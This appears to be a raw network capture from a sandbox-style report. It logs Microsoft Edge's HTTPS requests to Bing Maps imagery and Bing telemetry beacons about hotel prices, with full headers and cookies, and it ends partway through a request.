useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-vg/jFZ+btMHMdiCQEMD20WY2I3SyvuzjWfTPrsoiQwM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 561D85DA47054A288B94B000A68C017C Ref B: LON212050701035 Ref C: 2024-12-04T10:08:14Z
date: Wed, 04 Dec 2024 10:08:15 GMT
content-length: 7359
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f10145
GET

https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.329134,4.234374/10?ms=622,150&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&od=2&shading=hill&logo=n&da=ro&fmt=png&pp=48.32417678833008,4.305159091949463;S8;%C2%A399&pp=48.36305618286133,4.332777976989746;S552;&pp=48.29521179199219,4.135970115661621;S8;%C2%A339&pp=48.32417678833008,4.305159091949463;S8;%C2%A399&pp=48.328407287597656,4.115884780883789;S8;%C2%A362&pp=48.42100524902344,4.479507923126221;S8;%C2%A366&pp=48.33100891113281,4.099302768707275;S8;%C2%A373&pp=48.45736312866211,4.123088836669922;S8;%C2%A367&pp=48.42161560058594,4.480012893676758;S8;%C2%A375&&ppsc=dpsp,htp

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.329134,4.234374/10?ms=622,150&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&od=2&shading=hill&logo=n&da=ro&fmt=png&pp=48.32417678833008,4.305159091949463;S8;%C2%A399&pp=48.36305618286133,4.332777976989746;S552;&pp=48.29521179199219,4.135970115661621;S8;%C2%A339&pp=48.32417678833008,4.305159091949463;S8;%C2%A399&pp=48.328407287597656,4.115884780883789;S8;%C2%A362&pp=48.42100524902344,4.479507923126221;S8;%C2%A366&pp=48.33100891113281,4.099302768707275;S8;%C2%A373&pp=48.45736312866211,4.123088836669922;S8;%C2%A367&pp=48.42161560058594,4.480012893676758;S8;%C2%A375&&ppsc=dpsp,htp HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10797
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a0dbd8a4adf97b2602b33527ef5%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306886104%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a0dbd8a4adf97b2602b33527ef5%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306886104%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886128%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886140%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886161%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886370%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306886420%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22OCardCount%5B6%5D%22%2C%22FID%22%3A%22HotelPrices%22%7D%2C%7B%22ypid%22%3A%22YN2000x1190976147452155201%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A399%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a0dbd8a4adf97b2602b33527ef5%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306886104%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a0dbd8a4adf97b2602b33527ef5%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306886104%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886128%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306886129%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886140%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886161%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886370%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306886420%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22OCardCount%5B6%5D%22%2C%22FID%22%3A%22HotelPrices%22%7D%2C%7B%22ypid%22%3A%22YN2000x1190976147452155201%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A399%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10793
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1545x256073263%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1545x256073263%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10795
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x6096471577638952817%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A339%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x6096471577638952817%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A339%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10791
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1544x243384812%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A362%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN1544x243384812%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A362%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10796
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x9391523170225958935%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A366%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22ypid%22%3A%22YN2000x9391523170225958935%22%2C%22T%22%3A%22CI.Price%22%2C%22TS%22%3A1733306886510%2C%22Name%22%3A%22%C2%A366%22%2C%22FID%22%3A%22HotelPrices%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
